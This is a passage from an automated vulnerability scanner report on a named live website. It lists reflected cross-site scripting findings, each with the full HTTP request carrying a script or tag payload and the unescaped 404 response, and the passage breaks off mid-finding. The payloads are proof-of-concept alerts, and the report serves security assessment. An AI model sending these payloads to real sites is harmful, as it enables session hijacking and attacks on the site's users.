GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2ed741<a>6eb02ca4432 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2ed741<a>6eb02ca4432 was not found on this server.</p>
...[SNIP]...

2.2532. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8e1d<script>alert(1)</script>367bbbf9336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb8e1d<script>alert(1)</script>367bbbf9336/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb8e1d<script>alert(1)</script>367bbbf9336/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2533. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 237ab<script>alert(1)</script>d732f6c606d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37237ab<script>alert(1)</script>d732f6c606d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37237ab<script>alert(1)</script>d732f6c606d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2534. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27bba<script>alert(1)</script>7e21435fea2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes27bba<script>alert(1)</script>7e21435fea2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes27bba<script>alert(1)</script>7e21435fea2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2535. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b445<script>alert(1)</script>6e654bc30b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos4b445<script>alert(1)</script>6e654bc30b1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos4b445<script>alert(1)</script>6e654bc30b1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2536. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 771a0<script>alert(1)</script>8d7109893f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/search.php771a0<script>alert(1)</script>8d7109893f2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php771a0<script>alert(1)</script>8d7109893f2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2537. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 196fc<a>f2ca015ff03 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search196fc<a>f2ca015ff03&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search196fc<a>f2ca015ff03&opt=2 was not found on this server.</p>
...[SNIP]...

2.2538. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ce0a9<a>ccb599750f4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...ce0a9<a>ccb599750f4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...ce0a9<a>ccb599750f4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2539. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e39c5<script>alert(1)</script>195bdf3028f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e39c5<script>alert(1)</script>195bdf3028f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&e39c5<script>alert(1)</script>195bdf3028f=1 was not found on this server.</p>
...[SNIP]...

2.2540. http://www.resellerbase.com/detail/37/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d21c3<a>76bd2b87947 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d21c3<a>76bd2b87947 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d21c3<a>76bd2b87947 was not found on this server.</p>
...[SNIP]...

2.2541. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f37f<script>alert(1)</script>0dbd3f18974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5f37f<script>alert(1)</script>0dbd3f18974/37/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5f37f<script>alert(1)</script>0dbd3f18974/37/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2542. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e389<script>alert(1)</script>91fa49deb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/377e389<script>alert(1)</script>91fa49deb8/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/377e389<script>alert(1)</script>91fa49deb8/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2543. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd270<script>alert(1)</script>75061f5b4c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themescd270<script>alert(1)</script>75061f5b4c1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themescd270<script>alert(1)</script>75061f5b4c1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2544. http://www.resellerbase.com/detail/37/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eccf2<script>alert(1)</script>12775ebe60c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/search.phpeccf2<script>alert(1)</script>12775ebe60c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.phpeccf2<script>alert(1)</script>12775ebe60c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2545. http://www.resellerbase.com/detail/37/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a74dd<a>7af78abbe6b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Searcha74dd<a>7af78abbe6b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...&Submit3=Searcha74dd<a>7af78abbe6b&opt=2 was not found on this server.</p>
...[SNIP]...

2.2546. http://www.resellerbase.com/detail/37/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e90a8<a>57582dc67da was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/search.php?keyword=search...e90a8<a>57582dc67da&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...e90a8<a>57582dc67da&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2547. http://www.resellerbase.com/detail/37/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3896<script>alert(1)</script>cf2d1b9bd88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2&d3896<script>alert(1)</script>cf2d1b9bd88=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=2&d3896<script>alert(1)</script>cf2d1b9bd88=1 was not found on this server.</p>
...[SNIP]...

2.2548. http://www.resellerbase.com/detail/37/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6da8e<a>94cc66dc805 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=26da8e<a>94cc66dc805 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/search.php?keyword=search...&Submit3=Search&opt=26da8e<a>94cc66dc805 was not found on this server.</p>
...[SNIP]...

2.2549. http://www.resellerbase.com/detail/38/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d6bd<script>alert(1)</script>35f89b6807a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1d6bd<script>alert(1)</script>35f89b6807a/38/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

